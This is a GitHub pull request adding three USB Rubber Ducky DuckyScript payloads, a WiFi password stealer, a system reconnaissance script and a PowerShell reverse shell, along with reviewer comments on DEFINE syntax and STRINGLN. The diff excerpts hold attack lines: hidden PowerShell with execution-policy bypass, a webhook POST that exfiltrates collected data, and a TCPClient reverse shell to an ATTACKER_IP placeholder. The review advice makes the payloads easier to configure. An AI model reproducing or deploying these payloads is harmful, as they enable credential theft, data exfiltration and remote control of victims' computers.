Add NullSec Payload Collection - WiFi Stealer, System Recon, Reverse Shell#572
Add NullSec Payload Collection - WiFi Stealer, System Recon, Reverse Shell#572bad-antics wants to merge 2 commits into
Conversation
…hell) Added 3 DuckyScript 3.0 payloads: 1. NullSec-WiFi-Stealer (credentials/) - Extracts all saved WiFi passwords - Uses netsh for profile enumeration - Hidden execution, self-cleaning 2. NullSec-System-Recon (recon/) - Comprehensive system reconnaissance - Gathers OS, users, network, processes, software, AV status - PowerShell-based, no external tools 3. NullSec-Reverse-Shell (remote_access/) - Pure PowerShell reverse TCP shell - Interactive PS session - Configurable IP/port All payloads include proper headers, README documentation, and follow Hak5 contribution guidelines.
|
Yo |
| DELAY 1000 | ||
| GUI r | ||
| DELAY 500 | ||
| STRING powershell -w hidden |
There was a problem hiding this comment.
You can use STRINGLN instead of STRING ENTER it has the same functionality and makes the code cleaner and easier to read
| REM Display results (or exfil to your server) | ||
| REM Uncomment below to send to webhook: | ||
| REM STRING $data = Get-Content $outFile -Raw | ||
| REM STRING Invoke-WebRequest -Uri "https://example.com/hook" -Method POST -Body $data |
There was a problem hiding this comment.
It is recommended to use a DEFINEat the top of your payload, for user configurable options. for example,
DEFINE #WEBHOOK https://example.com/hook
STRING Invoke-WebRequest -Uri " #WEBHOOK" -Method POST -Body $data
This will inject https://example.com/hook inplace of #WEBHOOK This makes it easier for the end user to configure the payload.
| DELAY 1000 | ||
| GUI r | ||
| DELAY 500 | ||
| STRING powershell -w hidden |
There was a problem hiding this comment.
You can use STRINGLN instead of STRING ENTER it has the same functionality and makes the code cleaner and easier to read
| DELAY 1000 | ||
| GUI r | ||
| DELAY 500 | ||
| STRING powershell -w hidden -ep bypass |
There was a problem hiding this comment.
You can use STRINGLN instead of STRING ENTER it has the same functionality and makes the code cleaner and easier to read
| DELAY 1500 | ||
|
|
||
| REM PowerShell reverse shell | ||
| STRING $client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",ATTACKER_PORT); |
There was a problem hiding this comment.
Your DEFINE wont be injected properly here as there is no # You need to include a # for Defines that are inline.
DEFINE #ATTACKER_IP 192.168.1.100
DEFINE #ATTACKER_PORT 4444
STRING $client = New-Object System.Net.Sockets.TCPClient("#ATTACKER_IP",#ATTACKER_PORT);
- Replace STRING + ENTER with STRINGLN for cleaner code - Add # prefix to DEFINE variables for proper inline injection - Add DEFINE #WEBHOOK for user-configurable exfil endpoint - Add DEFINE #EXFIL_ENABLED toggle for WiFi Stealer - Bump version to 1.1 on all payloads
|
Hey @hak5peaks — checking in on this one. I believe all the review feedback from earlier rounds has been addressed in commits on the branch (most recently
Could you take another look when you get a chance? Happy to also add |
1 similar comment
|
Hey @hak5peaks — checking in on this one. I believe all the review feedback from earlier rounds has been addressed in commits on the branch (most recently
Could you take another look when you get a chance? Happy to also add |
| Modify the payload to add your exfil server: | ||
| 1. Uncomment the webhook lines | ||
| 2. Replace `example.com/hook` with your server | ||
|
|
There was a problem hiding this comment.
Inside of your payload, you have a DEFINE for using webhook. DEFINE #EXFIL_ENABLED FALSE Please include that this is by default set to false and its required to change to TRUE if the user wants to use that feature.
🦆 NullSec Payload Collection
Three new DuckyScript 3.0 payloads for the USB Rubber Ducky.
📁 Payloads Included
✨ Features
📋 Payload Details
WiFi Stealer
System Recon
Reverse Shell
🔗 Author
Thanks for maintaining this awesome project! 🐬